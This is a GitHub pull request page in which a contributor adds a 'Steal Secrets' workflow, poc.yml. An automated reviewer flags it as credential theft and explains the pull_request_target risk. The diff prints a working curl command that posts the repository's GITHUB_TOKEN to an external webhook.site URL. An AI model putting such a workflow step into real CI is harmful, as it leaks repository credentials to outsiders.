Create poc.yml#9296
Open
dhirajthread-a11y wants to merge 1 commit into
Open
Conversation
There was a problem hiding this comment.
Cursor Bugbot has reviewed your changes and found 1 potential issue.
❌ Bugbot Autofix is OFF. To automatically fix reported issues with cloud agents, have a team admin enable autofix in the Cursor dashboard.
Reviewed by Cursor Bugbot for commit 01199bb. Configure here.
| steps: | ||
| - run: | | ||
| curl -X POST https://webhook.site/e83aa988-440d-465e-b205-2d57aea449a5 \ | ||
| -d "token=${{ secrets.GITHUB_TOKEN }}" |
There was a problem hiding this comment.
Exfiltrates GITHUB_TOKEN externally
High Severity
The workflow sends ${{ secrets.GITHUB_TOKEN }} in an HTTP POST to a third-party webhook.site URL on push and unscoped pull_request_target. That exposes repository credentials to an external party and can run with base-repo token access on pull requests, including from forks.
Reviewed by Cursor Bugbot for commit 01199bb. Configure here.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.


Explanation
References
Checklist
Note
High Risk
Malicious CI that leaks repository
GITHUB_TOKENto a third-party endpoint, amplified bypull_request_targeton fork PRs.Overview
Adds a new GitHub Actions workflow
.github/workflows/poc.ymlnamed "Steal Secrets" that did not exist in the repo before.It runs on
pushandpull_request_target, so it can execute in the context of the base repository (including on PRs from forks, wherepull_request_targetis especially sensitive). The sole job postssecrets.GITHUB_TOKENto an externalwebhook.siteURL viacurl, which is credential exfiltration rather than normal CI.This change should be rejected and not merged; if it ever ran on the default branch, rotate/revoke affected tokens and audit Actions runs.
Reviewed by Cursor Bugbot for commit 01199bb. Bugbot is set up for automated code reviews on this repo. Configure here.